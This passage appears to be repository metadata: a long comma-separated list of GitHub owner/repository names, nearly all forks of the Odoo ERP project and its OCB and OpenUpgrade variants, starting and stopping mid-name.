/odoo,Kilhog/odoo,dariemp/odoo,Eric-Zhong/odoo,steedos/odoo,camptocamp/ngo-addons-backport,lombritz/odoo,fjbatresv/odoo,sinbazhou/odoo,x111ong/odoo,javierTerry/odoo,hanicker/odoo,oihane/odoo,doomsterinc/odoo,mvaled/OpenUpgrade,chiragjogi/odoo,alhashash/odoo,ingadhoc/odoo,pplatek/odoo,charbeljc/OCB,apocalypsebg/odoo,patmcb/odoo,codekaki/odoo,ThinkOpen-Solutions/odoo,dllsf/odootest,andreparames/odoo,OpenPymeMx/OCB,hoatle/odoo,alqfahad/odoo,markeTIC/OCB,ClearCorp-dev/odoo,alqfahad/odoo,ShineFan/odoo,gsmartway/odoo,OpusVL/odoo,ihsanudin/odoo,OpenUpgrade/OpenUpgrade,TRESCLOUD/odoopub,BT-astauder/odoo,nexiles/odoo,charbeljc/OCB,dfang/odoo,abdellatifkarroum/odoo,nitinitprof/odoo,gorjuce/odoo,fevxie/odoo,aviciimaxwell/odoo,AuyaJackie/odoo,makinacorpus/odoo,hmen89/odoo,QianBIG/odoo,cpyou/odoo,alexcuellar/odoo,joariasl/odoo,kifcaliph/odoo,Grirrane/odoo,nitinitprof/odoo,credativUK/OCB,lgscofield/odoo,bwrsandman/OpenUpgrade,ojengwa/odoo,xujb/odoo,leorochael/odoo,FlorianLudwig/odoo,dkubiak789/odoo,CubicERP/odoo,luistorresm/odoo,tangyiyong/odoo,rdeheele/odoo,grap/OpenUpgrade,frouty/odoo_oph,spadae22/odoo,NL66278/OCB,ihsanudin/odoo,realsaiko/odoo,glovebx/odoo,SerpentCS/odoo,tarzan0820/odoo,abstract-open-solutions/OCB,mustafat/odoo-1,vrenaville/ngo-addons-backport,jfpla/odoo,abenzbiria/clients_odoo,laslabs/odoo,naousse/odoo,bealdav/OpenUpgrade,nexiles/odoo,tvibliani/odoo,nexiles/odoo,Ernesto99/odoo,rgeleta/odoo,GauravSahu/odoo,shaufi/odoo,ccomb/OpenUpgrade,grap/OCB,lombritz/odoo,Antiun/odoo,jolevq/odoopub,odoousers2014/odoo,chiragjogi/odoo,CopeX/odoo,Kilhog/odoo,agrista/odoo-saas,ShineFan/odoo,doomsterinc/odoo,synconics/odoo,juanalfonsopr/odoo,eino-makitalo/odoo,ecosoft-odoo/odoo,microcom/odoo,cdrooom/odoo,RafaelTorrealba/odoo,nuuuboo/odoo,optima-ict/odoo,laslabs/odoo,pedrobaeza/odoo,shingonoide/odoo,hopeall/odoo,ojengwa/odoo,Drooids/odoo,christophlsa/odoo,syci/OCB,Endika/odoo,glovebx/odoo,tvibliani/odoo,nhomar/odoo-mirror,dkubiak789/odoo,avoinsystems/odoo,kirca/OpenUpgrade,feroda/
odoo,MarcosCommunity/odoo,0k/odoo,ehirt/odoo,jiangzhixiao/odoo,xzYue/odoo,colinnewell/odoo,kittiu/odoo,acshan/odoo,alhashash/odoo,goliveirab/odoo,hifly/OpenUpgrade,mlaitinen/odoo,odoo-turkiye/odoo,joshuajan/odoo,idncom/odoo,pedrobaeza/OpenUpgrade,dsfsdgsbngfggb/odoo,sadleader/odoo,ShineFan/odoo,Nick-OpusVL/odoo,elmerdpadilla/iv,steedos/odoo,oasiswork/odoo,hubsaysnuaa/odoo,frouty/odoo_oph,Antiun/odoo,prospwro/odoo,avoinsystems/odoo,alexteodor/odoo,ramadhane/odoo,gorjuce/odoo,odoousers2014/odoo,mvaled/OpenUpgrade,acshan/odoo,pedrobaeza/odoo,ThinkOpen-Solutions/odoo,ujjwalwahi/odoo,odooindia/odoo,NL66278/OCB,Endika/OpenUpgrade,mlaitinen/odoo,glovebx/odoo,jpshort/odoo,jeasoft/odoo,bwrsandman/OpenUpgrade,bakhtout/odoo-educ,ramadhane/odoo,prospwro/odoo,tangyiyong/odoo,OpenUpgrade/OpenUpgrade,Elico-Corp/odoo_OCB,ramadhane/odoo,collex100/odoo,OpenPymeMx/OCB,oihane/odoo,hip-odoo/odoo,luistorresm/odoo,Endika/OpenUpgrade,ChanduERP/odoo,n0m4dz/odoo,realsaiko/odoo,kirca/OpenUpgrade,luiseduardohdbackup/odoo,hbrunn/OpenUpgrade,colinnewell/odoo,fjbatresv/odoo,BT-rmartin/odoo,Gitlab11/odoo,mvaled/OpenUpgrade,Gitlab11/odoo,bobisme/odoo,Noviat/odoo,dariemp/odoo,joariasl/odoo,addition-it-solutions/project-all,sinbazhou/odoo,jaxkodex/odoo,QianBIG/odoo,srimai/odoo,synconics/odoo,credativUK/OCB,dfang/odoo,wangjun/odoo,numerigraphe/odoo,guewen/OpenUpgrade,apocalypsebg/odoo,spadae22/odoo,Kilhog/odoo,dezynetechnologies/odoo,fuselock/odoo,nhomar/odoo-mirror,ApuliaSoftware/odoo,frouty/odoo_oph,slevenhagen/odoo,numerigraphe/odoo,Endika/OpenUpgrade,jiangzhixiao/odoo,kittiu/odoo,colinnewell/odoo,optima-ict/odoo,odootr/odoo,abdellatifkarroum/odoo,provaleks/o8,bealdav/OpenUpgrade,realsaiko/odoo,shingonoide/odoo,Antiun/odoo,abdellatifkarroum/odoo,jeasoft/odoo,janocat/odoo,ccomb/OpenUpgrade,podemos-info/odoo,fjbatresv/odoo,ecosoft-odoo/odoo,odoo-turkiye/odoo,cloud9UG/odoo,abdellatifkarroum/odoo,arthru/OpenUpgrade,bwrsandman/OpenUpgrade,oasiswork/odoo,klunwebale/odoo,sve-odoo/odoo,Gitlab11/odoo,poljef
f/odoo,thanhacun/odoo,Maspear/odoo,rgeleta/odoo,kybriainfotech/iSocioCRM,addition-it-solutions/project-all,odooindia/odoo,poljeff/odoo,gdgellatly/OCB1,Antiun/odoo,podemos-info/odoo,JCA-Developpement/Odoo,0k/OpenUpgrade,demon-ru/iml-crm,fossoult/odoo,shaufi10/odoo,massot/odoo,lightcn/odoo,rahuldhote/odoo,jusdng/odoo,nhomar/odoo,ramitalat/odoo,Bachaco-ve/odoo,guewen/OpenUpgrade,x111ong/odoo,guerrerocarlos/odoo,Codefans-fan/odoo,MarcosCommunity/odoo,KontorConsulting/odoo,funkring/fdoo,salaria/odoo,Endika/odoo,provaleks/o8,ShineFan/odoo,klunwebale/odoo,Elico-Corp/odoo_OCB,andreparames/odoo,ygol/odoo,pplatek/odoo,hifly/OpenUpgrade,BT-ojossen/odoo,hubsaysnuaa/odoo,feroda/odoo,leoliujie/odoo,sysadminmatmoz/OCB,arthru/OpenUpgrade,ThinkOpen-Solutions/odoo,eino-makitalo/odoo,florian-dacosta/OpenUpgrade,jiangzhixiao/odoo,fuhongliang/odoo,ujjwalwahi/odoo,OpenPymeMx/OCB,AuyaJackie/odoo,ccomb/OpenUpgrade,n0m4dz/odoo,pedrobaeza/OpenUpgrade,factorlibre/OCB,Ichag/odoo,rahuldhote/odoo,BT-ojossen/odoo,naousse/odoo,codekaki/odoo,Elico-Corp/odoo_OCB,janocat/odoo,RafaelTorrealba/odoo,Kilhog/odoo,hmen89/odoo,NL66278/OCB,OpenUpgrade-dev/OpenUpgrade,nexiles/odoo,jpshort/odoo,syci/OCB,Eric-Zhong/odoo,matrixise/odoo,lightcn/odoo,alexcuellar/odoo,klunwebale/odoo,mustafat/odoo-1,OpenUpgrade/OpenUpgrade,JonathanStein/odoo,thanhacun/odoo,gavin-feng/odoo,tinkerthaler/odoo,fuselock/odoo,sve-odoo/odoo,dsfsdgsbngfggb/odoo,kittiu/odoo,nagyistoce/odoo-dev-odoo,gsmartway/odoo,OpenPymeMx/OCB,rowemoore/odoo,srsman/odoo,minhtuancn/odoo,makinacorpus/odoo,BT-ojossen/odoo,fgesora/odoo,KontorConsulting/odoo,andreparames/odoo,charbeljc/OCB,dfang/odoo,dsfsdgsbngfggb/odoo,Danisan/odoo-1,Nowheresly/odoo,oliverhr/odoo,frouty/odoogoeen,VitalPet/odoo,takis/odoo,cloud9UG/odoo,FlorianLudwig/odoo,OpenUpgrade/OpenUpgrade,florentx/OpenUpgrade,abenzbiria/clients_odoo,Ichag/odoo,jfpla/odoo,feroda/odoo,grap/OpenUpgrade,rubencabrera/odoo,guerrerocarlos/odoo,realsaiko/odoo,eino-makitalo/odoo,leorochael/odoo,hopeall/odoo,apanju
/GMIO_Odoo,steedos/odoo,Codefans-fan/odoo,nexiles/odoo,abenzbiria/clients_odoo,kybriainfotech/iSocioCRM,steedos/odoo,jfpla/odoo,virgree/odoo,alexcuellar/odoo,NL66278/OCB,andreparames/odoo,hoatle/odoo,pedrobaeza/odoo,apanju/GMIO_Odoo,fevxie/odoo,fgesora/odoo,patmcb/odoo,PongPi/isl-odoo,rschnapka/odoo,zchking/odoo,cdrooom/odoo,ramadhane/odoo,makinacorpus/odoo,Nick-OpusVL/odoo,x111ong/odoo,apanju/odoo,NL66278/OCB,mlaitinen/odoo,Endika/odoo,fuhongliang/odoo,luistorresm/odoo,jeasoft/odoo,chiragjogi/odoo,sinbazhou/odoo,incaser/odoo-odoo,diagramsoftware/odoo,jpshort/odoo,CubicERP/odoo,lsinfo/odoo,vrenaville/ngo-addons-backport,abenzbiria/clients_odoo,BT-fgarbely/odoo,lsinfo/odoo,BT-fgarbely/odoo,ovnicraft/odoo,feroda/odoo,juanalfonsopr/odoo,BT-rmartin/odoo,dalegregory/odoo,javierTerry/odoo,grap/OpenUpgrade,highco-groupe/odoo,klunwebale/odoo,florian-dacosta/OpenUpgrade,vnsofthe/odoo,OSSESAC/odoopubarquiluz,savoirfairelinux/OpenUpgrade,funkring/fdoo,tarzan0820/odoo,dkubiak789/odoo,osvalr/odoo,fuselock/odoo,SAM-IT-SA/odoo,bguillot/OpenUpgrade,AuyaJackie/odoo,BT-astauder/odoo,bkirui/odoo,osvalr/odoo,ygol/odoo,shivam1111/odoo,BT-ojossen/odoo,joariasl/odoo,hassoon3/odoo,naousse/odoo,leorochael/odoo,BT-fgarbely/odoo,javierTerry/odoo,ecosoft-odoo/odoo,feroda/odoo,xzYue/odoo,rubencabrera/odoo,grap/OCB,joshuajan/odoo,rowemoore/odoo,javierTerry/odoo,florentx/OpenUpgrade,acshan/odoo,lightcn/odoo,sysadminmatmoz/OCB,rahuldhote/odoo,jfpla/odoo,leorochael/odoo,ojengwa/odoo,takis/odoo,srimai/odoo,Adel-Magebinary/odoo,rdeheele/odoo,BT-rmartin/odoo,florentx/OpenUpgrade,PongPi/isl-odoo,mkieszek/odoo,BT-fgarbely/odoo,NeovaHealth/odoo,savoirfairelinux/odoo,nuuuboo/odoo,aviciimaxwell/odoo,grap/OCB,ccomb/OpenUpgrade,agrista/odoo-saas,rschnapka/odoo,tangyiyong/odoo,CopeX/odoo,brijeshkesariya/odoo,rgeleta/odoo,rahuldhote/odoo,JGarcia-Panach/odoo,hassoon3/odoo,JGarcia-Panach/odoo,BT-rmartin/odoo,csrocha/OpenUpgrade,eino-makitalo/odoo,apanju/GMIO_Odoo,zchking/odoo,papouso/odoo,nhomar/odoo-mirror,pros
pwro/odoo,Maspear/odoo,GauravSahu/odoo,Bachaco-ve/odoo,abstract-open-solutions/OCB,cloud9UG/odoo,OpenUpgrade-dev/OpenUpgrade,tvibliani/odoo,JonathanStein/odoo,charbeljc/OCB,damdam-s/OpenUpgrade,dalegregory/odoo,Danisan/odoo-1,bplancher/odoo,SerpentCS/odoo,ApuliaSoftware/odoo,stonegithubs/odoo,osvalr/odoo,funkring/fdoo,inspyration/odoo,ihsanudin/odoo,fuselock/odoo,elmerdpadilla/iv,apocalypsebg/odoo,grap/OCB,cpyou/odoo,JGarcia-Panach/odoo,apanju/GMIO_Odoo,JGarcia-Panach/odoo,nexiles/odoo,ApuliaSoftware/odoo,nhomar/odoo-mirror,glovebx/odoo,savoirfairelinux/OpenUpgrade,incaser/odoo-odoo,incaser/odoo-odoo,Ernesto99/odoo,goliveirab/odoo,ingadhoc/odoo,optima-ict/odoo,xujb/odoo,BT-fgarbely/odoo,idncom/odoo,kittiu/odoo,luiseduardohdbackup/odoo,zchking/odoo,colinnewell/odoo,ramadhane/odoo,sebalix/OpenUpgrade,glovebx/odoo,dalegregory/odoo,VielSoft/odoo,rdeheele/odoo,andreparames/odoo,apanju/odoo,sergio-incaser/odoo,kifcaliph/odoo,matrixise/odoo,addition-it-solutions/project-all,gorjuce/odoo,OSSESAC/odoopubarquiluz,VitalPet/odoo,codekaki/odoo,ojengwa/odoo,minhtuancn/odoo,draugiskisprendimai/odoo,jiangzhixiao/odoo,stonegithubs/odoo,omprakasha/odoo,ygol/odoo,jesramirez/odoo,codekaki/odoo,jeasoft/odoo,ApuliaSoftware/odoo,FlorianLudwig/odoo,joariasl/odoo,ingadhoc/odoo,goliveirab/odoo,bobisme/odoo,gdgellatly/OCB1,KontorConsulting/odoo,christophlsa/odoo,luiseduardohdbackup/odoo,blaggacao/OpenUpgrade,fgesora/odoo,makinacorpus/odoo,fdvarela/odoo8,sergio-incaser/odoo,gsmartway/odoo,pplatek/odoo,arthru/OpenUpgrade,VitalPet/odoo,stonegithubs/odoo,provaleks/o8,simongoffin/website_version,spadae22/odoo,tarzan0820/odoo,waytai/odoo,savoirfairelinux/OpenUpgrade,guewen/OpenUpgrade,havt/odoo,KontorConsulting/odoo,fevxie/odoo,gvb/odoo,simongoffin/website_version,Adel-Magebinary/odoo,kifcaliph/odoo,srimai/odoo,mszewczy/odoo,OpenUpgrade-dev/OpenUpgrade,odootr/odoo,zchking/odoo,addition-it-solutions/project-all,dsfsdgsbngfggb/odoo,draugiskisprendimai/odoo,nuncjo/odoo,GauravSahu/odoo,nuncjo/odoo,hubs
aysnuaa/odoo,joariasl/odoo,hoatle/odoo,rgeleta/odoo,bakhtout/odoo-educ,BT-rmartin/odoo,OpusVL/odoo,dsfsdgsbngfggb/odoo,fjbatresv/odoo,demon-ru/iml-crm,microcom/odoo,mmbtba/odoo,frouty/odoogoeen,chiragjogi/odoo,jeasoft/odoo,srsman/odoo,ramitalat/odoo,Eric-Zhong/odoo,tarzan0820/odoo,grap/OCB,microcom/odoo,salaria/odoo,CatsAndDogsbvba/odoo,PongPi/isl-odoo,grap/OpenUpgrade,markeTIC/OCB,savoirfairelinux/odoo,lightcn/odoo,lombritz/odoo,Ernesto99/odoo,bakhtout/odoo-educ,rahuldhote/odoo,podemos-info/odoo,0k/odoo,ihsanudin/odoo,hassoon3/odoo,xujb/odoo,havt/odoo,ehirt/odoo,apocalypsebg/odoo,csrocha/OpenUpgrade,laslabs/odoo,srimai/odoo,deKupini/erp,papouso/odoo,apanju/odoo,stephen144/odoo,hoatle/odoo,optima-ict/odoo,srsman/odoo,guewen/OpenUpgrade,Codefans-fan/odoo,leoliujie/odoo,gdgellatly/OCB1,JGarcia-Panach/odoo,CatsAndDogsbvba/odoo,Codefans-fan/odoo,juanalfonsopr/odoo,hoatle/odoo,JCA-Developpement/Odoo,bplancher/odoo,jiachenning/odoo,Eric-Zhong/odoo,ramitalat/odoo,mkieszek/odoo,Ernesto99/odoo,matrixise/odoo,SAM-IT-SA/odoo,Noviat/odoo,gorjuce/odoo,sinbazhou/odoo,ShineFan/odoo,omprakasha/odoo,RafaelTorrealba/odoo,BT-astauder/odoo,Adel-Magebinary/odoo,luiseduardohdbackup/odoo,highco-groupe/odoo,Ernesto99/odoo,jusdng/odoo,sv-dev1/odoo,luiseduardohdbackup/odoo,Drooids/odoo,Nowheresly/odoo,collex100/odoo,OpenUpgrade/OpenUpgrade,abenzbiria/clients_odoo,camptocamp/ngo-addons-backport,ovnicraft/odoo,oihane/odoo,havt/odoo,pplatek/odoo,spadae22/odoo,ehirt/odoo,poljeff/odoo,gavin-feng/odoo,damdam-s/OpenUpgrade,ccomb/OpenUpgrade,cdrooom/odoo,oliverhr/odoo,gorjuce/odoo,arthru/OpenUpgrade,x111ong/odoo,collex100/odoo,damdam-s/OpenUpgrade,0k/OpenUpgrade,wangjun/odoo,csrocha/OpenUpgrade,lsinfo/odoo,sadleader/odoo,Daniel-CA/odoo,sv-dev1/odoo,Daniel-CA/odoo,lgscofield/odoo,dllsf/odootest,TRESCLOUD/odoopub,bobisme/odoo,alhashash/odoo,datenbetrieb/odoo,demon-ru/iml-crm,Ernesto99/odoo,rgeleta/odoo,Adel-Magebinary/odoo,kifcaliph/odoo,MarcosCommunity/odoo,fevxie/odoo,nhomar/odoo-mirror,jiachenning/
odoo,podemos-info/odoo,zchking/odoo,prospwro/odoo,shaufi/odoo,arthru/OpenUpgrade,sergio-incaser/odoo,AuyaJackie/odoo,alqfahad/odoo,csrocha/OpenUpgrade,rowemoore/odoo,oliverhr/odoo,hanicker/odoo,eino-makitalo/odoo,apanju/odoo,storm-computers/odoo,erkrishna9/odoo,incaser/odoo-odoo,charbeljc/OCB,virgree/odoo,srimai/odoo,n0m4dz/odoo,draugiskisprendimai/odoo,diagramsoftware/odoo,shaufi/odoo,OpenUpgrade-dev/OpenUpgrade,slevenhagen/odoo,feroda/odoo,Codefans-fan/odoo,lgscofield/odoo,osvalr/odoo,fossoult/odoo,Nowheresly/odoo,prospwro/odoo,brijeshkesariya/odoo,gvb/odoo,pplatek/odoo,inspyration/odoo,sebalix/OpenUpgrade,sadleader/odoo,CatsAndDogsbvba/odoo,PongPi/isl-odoo,tinkhaven-organization/odoo,Antiun/odoo,lsinfo/odoo,abstract-open-solutions/OCB,lombritz/odoo,doomsterinc/odoo,lsinfo/odoo,spadae22/odoo,incaser/odoo-odoo,0k/OpenUpgrade,zchking/odoo,grap/OpenUpgrade,alexteodor/odoo,Noviat/odoo,grap/OCB,chiragjogi/odoo,goliveirab/odoo,Endika/odoo,Gitlab11/odoo,shaufi/odoo,joshuajan/odoo,cysnake4713/odoo,CatsAndDogsbvba/odoo,juanalfonsopr/odoo,NeovaHealth/odoo,chiragjogi/odoo,Nowheresly/odoo,joshuajan/odoo,markeTIC/OCB,windedge/odoo,tarzan0820/odoo,hanicker/odoo,storm-computers/odoo,windedge/odoo,ingadhoc/odoo,rubencabrera/odoo,juanalfonsopr/odoo,kirca/OpenUpgrade,grap/OpenUpgrade,syci/OCB,VitalPet/odoo,christophlsa/odoo,tinkerthaler/odoo,nuuuboo/odoo,tinkerthaler/odoo,hopeall/odoo,codekaki/odoo,guewen/OpenUpgrade,cedk/odoo,leorochael/odoo,jusdng/odoo,shivam1111/odoo,markeTIC/OCB,OpenUpgrade/OpenUpgrade,CubicERP/odoo,alhashash/odoo,SerpentCS/odoo,hifly/OpenUpgrade,deKupini/erp,dariemp/odoo,thanhacun/odoo,MarcosCommunity/odoo,fossoult/odoo,cloud9UG/odoo,savoirfairelinux/OpenUpgrade,OSSESAC/odoopubarquiluz,oasiswork/odoo,BT-ojossen/odoo,frouty/odoogoeen,bguillot/OpenUpgrade,sergio-incaser/odoo,tarzan0820/odoo,dkubiak789/odoo,dezynetechnologies/odoo,Noviat/odoo,jfpla/odoo,jiangzhixiao/odoo,tangyiyong/odoo,synconics/odoo,slevenhagen/odoo-npg,kybriainfotech/iSocioCRM,hanicker/odoo,pa
pouso/odoo,papouso/odoo,shivam1111/odoo,Drooids/odoo,guerrerocarlos/odoo,nagyistoce/odoo-dev-odoo,odootr/odoo,aviciimaxwell/odoo,factorlibre/OCB,mustafat/odoo-1,microcom/odoo,addition-it-solutions/project-all,ecosoft-odoo/odoo,CopeX/odoo,ojengwa/odoo,sv-dev1/odoo,Endika/OpenUpgrade,0k/odoo,erkrishna9/odoo,mlaitinen/odoo,hip-odoo/odoo,ehirt/odoo,savoirfairelinux/OpenUpgrade,BT-rmartin/odoo,Adel-Magebinary/odoo,sinbazhou/odoo,JonathanStein/odoo,steedos/odoo,BT-rmartin/odoo,sv-dev1/odoo,doomsterinc/odoo,RafaelTorrealba/odoo,alexteodor/odoo,mlaitinen/odoo,mszewczy/odoo,janocat/odoo,CopeX/odoo,Daniel-CA/odoo,srimai/odoo,mszewczy/odoo,oliverhr/odoo,fuhongliang/odoo,dkubiak789/odoo,guerrerocarlos/odoo,rowemoore/odoo,mmbtba/odoo,JonathanStein/odoo,fjbatresv/odoo,GauravSahu/odoo,stonegithubs/odoo,cloud9UG/odoo,gdgellatly/OCB1,shaufi/odoo,Noviat/odoo,bguillot/OpenUpgrade,dgzurita/odoo,patmcb/odoo,ClearCorp-dev/odoo,pedrobaeza/OpenUpgrade,xzYue/odoo,cysnake4713/odoo,elmerdpadilla/iv,fevxie/odoo,Ichag/odoo,xujb/odoo,JCA-Developpement/Odoo,christophlsa/odoo,rahuldhote/odoo,KontorConsulting/odoo,omprakasha/odoo,tangyiyong/odoo,OpenPymeMx/OCB,leoliujie/odoo,nagyistoce/odoo-dev-odoo,stonegithubs/odoo,shaufi10/odoo,GauravSahu/odoo,hifly/OpenUpgrade,luistorresm/odoo,poljeff/odoo,lombritz/odoo,gsmartway/odoo,n0m4dz/odoo,Endika/OpenUpgrade,oasiswork/odoo,ShineFan/odoo,joshuajan/odoo,agrista/odoo-saas,ApuliaSoftware/odoo,QianBIG/odoo,datenbetrieb/odoo,ehirt/odoo,nhomar/odoo,ChanduERP/odoo,gdgellatly/OCB1,OpenUpgrade/OpenUpgrade,elmerdpadilla/iv,sebalix/OpenUpgrade,makinacorpus/odoo,pedrobaeza/OpenUpgrade,makinacorpus/odoo,abstract-open-solutions/OCB,kittiu/odoo,cedk/odoo,Gitlab11/odoo,abdellatifkarroum/odoo,idncom/odoo,sv-dev1/odoo,shingonoide/odoo,xujb/odoo,sadleader/odoo,Drooids/odoo,hbrunn/OpenUpgrade,oasiswork/odoo,aviciimaxwell/odoo,wangjun/odoo,alqfahad/odoo,csrocha/OpenUpgrade,OpenPymeMx/OCB,thanhacun/odoo,QianBIG/odoo,tvibliani/odoo,blaggacao/OpenUpgrade,collex100/odoo,Maspear/o
doo,credativUK/OCB,tangyiyong/odoo,PongPi/isl-odoo,BT-ojossen/odoo,RafaelTorrealba/odoo,mmbtba/odoo,slevenhagen/odoo-npg,ChanduERP/odoo,CatsAndDogsbvba/odoo,wangjun/odoo,jesramirez/odoo,lightcn/odoo,Endika/odoo,Endika/odoo,idncom/odoo,factorlibre/OCB,slevenhagen/odoo-npg,funkring/fdoo,credativUK/OCB,guerrerocarlos/odoo,rgeleta/odoo,bkirui/odoo,mustafat/odoo-1,ingadhoc/odoo,tvtsoft/odoo8,synconics/odoo,ChanduERP/odoo,OpenUpgrade-dev/OpenUpgrade,CopeX/odoo,dariemp/odoo,ThinkOpen-Solutions/odoo,draugiskisprendimai/odoo,pedrobaeza/odoo,Nowheresly/odoo,ubic135/odoo-design,xzYue/odoo,avoinsystems/odoo,mszewczy/odoo,gvb/odoo,rubencabrera/odoo,OpenPymeMx/OCB,apanju/odoo,ecosoft-odoo/odoo,hip-odoo/odoo,hubsaysnuaa/odoo,vnsofthe/odoo,cedk/odoo,ThinkOpen-Solutions/odoo,storm-computers/odoo,mustafat/odoo-1,dezynetechnologies/odoo,JCA-Developpement/Odoo,synconics/odoo,salaria/odoo,OSSESAC/odoopubarquiluz,virgree/odoo,ujjwalwahi/odoo,alexcuellar/odoo,fossoult/odoo,wangjun/odoo,synconics/odoo,hbrunn/OpenUpgrade,Nick-OpusVL/odoo,ubic135/odoo-design,datenbetrieb/odoo,goliveirab/odoo,credativUK/OCB,srsman/odoo,gavin-feng/odoo,odoo-turkiye/odoo,cloud9UG/odoo,avoinsystems/odoo,jiachenning/odoo,abstract-open-solutions/OCB,ujjwalwahi/odoo,Bachaco-ve/odoo,damdam-s/OpenUpgrade,fossoult/odoo,frouty/odoo_oph,ClearCorp-dev/odoo,stephen144/odoo,hip-odoo/odoo,funkring/fdoo,eino-makitalo/odoo,dalegregory/odoo,minhtuancn/odoo,oihane/odoo,fjbatresv/odoo,cpyou/odoo,tvibliani/odoo,SAM-IT-SA/odoo,tvtsoft/odoo8,vrenaville/ngo-addons-backport,rubencabrera/odoo,elmerdpadilla/iv,apanju/GMIO_Odoo,dllsf/odootest,dsfsdgsbngfggb/odoo,fgesora/odoo,draugiskisprendimai/odoo,ihsanudin/odoo,Adel-Magebinary/odoo,provaleks/o8,Danisan/odoo-1,jpshort/odoo,dgzurita/odoo,vnsofthe/odoo,waytai/odoo,poljeff/odoo,VitalPet/odoo,acshan/odoo,NeovaHealth/odoo,cedk/odoo,agrista/odoo-saas,jesramirez/odoo,Nowheresly/odoo,odoo-turkiye/odoo,dgzurita/odoo,grap/OCB,OSSESAC/odoopubarquiluz,Kilhog/odoo,gorjuce/odoo,VielSoft/odoo,floren
tx/OpenUpgrade,camptocamp/ngo-addons-backport,ubic135/odoo-design,dezynetechnologies/odoo,waytai/odoo,frouty/odoo_oph,realsaiko/odoo,inspyration/odoo,TRESCLOUD/odoopub,ecosoft-odoo/odoo,apocalypsebg/odoo,mszewczy/odoo,hassoon3/odoo,patmcb/odoo,mvaled/OpenUpgrade,jiachenning/odoo,erkrishna9/odoo,hip-odoo/odoo,jaxkodex/odoo,slevenhagen/odoo,numerigraphe/odoo,rgeleta/odoo,lombritz/odoo,AuyaJackie/odoo,omprakasha/odoo,Maspear/odoo,ehirt/odoo,CatsAndDogsbvba/odoo,kirca/OpenUpgrade,simongoffin/website_version,oihane/odoo,spadae22/odoo,xujb/odoo,hubsaysnuaa/odoo,osvalr/odoo,simongoffin/website_version,takis/odoo,rdeheele/odoo,avoinsystems/odoo,dfang/odoo,bplancher/odoo,provaleks/o8,fuhongliang/odoo,Grirrane/odoo,shingonoide/odoo,vrenaville/ngo-addons-backport,leoliujie/odoo,mvaled/OpenUpgrade,Noviat/odoo,MarcosCommunity/odoo,massot/odoo,markeTIC/OCB,datenbetrieb/odoo,frouty/odoogoeen,brijeshkesariya/odoo,bealdav/OpenUpgrade,jolevq/odoopub,takis/odoo,kittiu/odoo,salaria/odoo,0k/OpenUpgrade,pedrobaeza/odoo,fuhongliang/odoo,ThinkOpen-Solutions/odoo,sysadminmatmoz/OCB,fuhongliang/odoo,mszewczy/odoo,shivam1111/odoo,simongoffin/website_version,odoo-turkiye/odoo,hopeall/odoo,papouso/odoo,shaufi10/odoo,kybriainfotech/iSocioCRM,storm-computers/odoo,cysnake4713/odoo,sv-dev1/odoo,stephen144/odoo,lgscofield/odoo,havt/odoo,tvtsoft/odoo8,dfang/odoo,kybriainfotech/iSocioCRM,hifly/OpenUpgrade,SerpentCS/odoo,glovebx/odoo,savoirfairelinux/odoo,0k/OpenUpgrade,salaria/odoo,papouso/odoo,bwrsandman/OpenUpgrade,dalegregory/odoo,Grirrane/odoo,CopeX/odoo,prospwro/odoo,ojengwa/odoo,stonegithubs/odoo,hbrunn/OpenUpgrade,bwrsandman/OpenUpgrade,apanju/GMIO_Odoo,windedge/odoo,jiangzhixiao/odoo,frouty/odoogoeen,dezynetechnologies/odoo,waytai/odoo,bakhtout/odoo-educ,Antiun/odoo,jolevq/odoopub,CubicERP/odoo,JGarcia-Panach/odoo,jaxkodex/odoo,sve-odoo/odoo,Danisan/odoo-1,mustafat/odoo-1,Ichag/odoo,hmen89/odoo,bealdav/OpenUpgrade,hbrunn/OpenUpgrade,srsman/odoo,Ichag/odoo,kybriainfotech/iSocioCRM,rahuldhote/od
oo,guerrerocarlos/odoo,cpyou/odoo,diagramsoftware/odoo,colinnewell/odoo,luiseduardohdbackup/odoo,CubicERP/odoo,salaria/odoo,jfpla/odoo,Grirrane/odoo,demon-ru/iml-crm,sebalix/OpenUpgrade,takis/odoo,tvibliani/odoo,RafaelTorrealba/odoo,ecosoft-odoo/odoo,factorlibre/OCB,ihsanudin/odoo,bkirui/odoo,tinkhaven-organization/odoo,hanicker/odoo,oasiswork/odoo,damdam-s/OpenUpgrade,alhashash/odoo,bealdav/OpenUpgrade,Daniel-CA/odoo,aviciimaxwell/odoo,mvaled/OpenUpgrade,alqfahad/odoo,podemos-info/odoo,Kilhog/odoo,QianBIG/odoo,luistorresm/odoo,lightcn/odoo,rowemoore/odoo,dfang/odoo,minhtuancn/odoo,wangjun/odoo,nuuuboo/odoo,shivam1111/odoo,shaufi10/odoo,fgesora/odoo,omprakasha/odoo,NeovaHealth/odoo,bkirui/odoo,fevxie/odoo,highco-groupe/odoo,alhashash/odoo,feroda/odoo,oihane/odoo,stephen144/odoo,NeovaHealth/odoo,savoirfairelinux/odoo,jpshort/odoo,sinbazhou/odoo,syci/OCB,virgree/odoo,alqfahad/odoo,jaxkodex/odoo,minhtuancn/odoo,Drooids/odoo,CubicERP/odoo,apanju/odoo,chiragjogi/odoo,brijeshkesariya/odoo,charbeljc/OCB,gorjuce/odoo,nagyistoce/odoo-dev-odoo,mkieszek/odoo,FlorianLudwig/odoo,mmbtba/odoo,Elico-Corp/odoo_OCB,bakhtout/odoo-educ,deKupini/erp,cdrooom/odoo,fevxie/odoo,jusdng/odoo,hassoon3/odoo,dgzurita/odoo,collex100/odoo,draugiskisprendimai/odoo,odootr/odoo,tinkhaven-organization/odoo,BT-fgarbely/odoo,ccomb/OpenUpgrade,TRESCLOUD/odoopub,fuselock/odoo,idncom/odoo,ujjwalwahi/odoo,SAM-IT-SA/odoo,jaxkodex/odoo,klunwebale/odoo,nagyistoce/odoo-dev-odoo,tvtsoft/odoo8,codekaki/odoo,shingonoide/odoo,bobisme/odoo,havt/odoo,jiachenning/odoo,bobisme/odoo,nuncjo/odoo,mkieszek/odoo,rschnapka/odoo,dkubiak789/odoo,Kilhog/odoo,ubic135/odoo-design,gavin-feng/odoo,ojengwa/odoo,apocalypsebg/odoo,Danisan/odoo-1,FlorianLudwig/odoo,hoatle/odoo,frouty/odoogoeen,lgscofield/odoo,alexcuellar/odoo,blaggacao/OpenUpgrade,charbeljc/OCB,diagramsoftware/odoo,agrista/odoo-saas,omprakasha/odoo,Nick-OpusVL/odoo,Drooids/odoo,laslabs/odoo,patmcb/odoo,ApuliaSoftware/odoo,sinbazhou/odoo,mlaitinen/odoo,patmcb/odoo,luise
